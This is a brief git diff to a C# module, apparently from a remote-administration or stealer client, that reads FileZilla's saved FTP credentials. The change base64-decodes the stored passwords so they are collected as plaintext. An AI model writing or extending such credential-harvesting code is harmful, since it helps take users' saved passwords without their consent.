diff --git a/Client/Core/Recovery/FtpClients/FileZilla.cs b/Client/Core/Recovery/FtpClients/FileZilla.cs index 5e1c6b0f..53ba678e 100644 --- a/Client/Core/Recovery/FtpClients/FileZilla.cs +++ b/Client/Core/Recovery/FtpClients/FileZilla.cs @@ -40,7 +40,7 @@ public static List GetSavedPasswords() if (xmlNodeChild.Name == "User") szUsername = xmlNodeChild.InnerText; if (xmlNodeChild.Name == "Pass") - szPassword = xmlNodeChild.InnerText; + szPassword = Base64Decode(xmlNodeChild.InnerText); } data.Add(new RecoveredAccount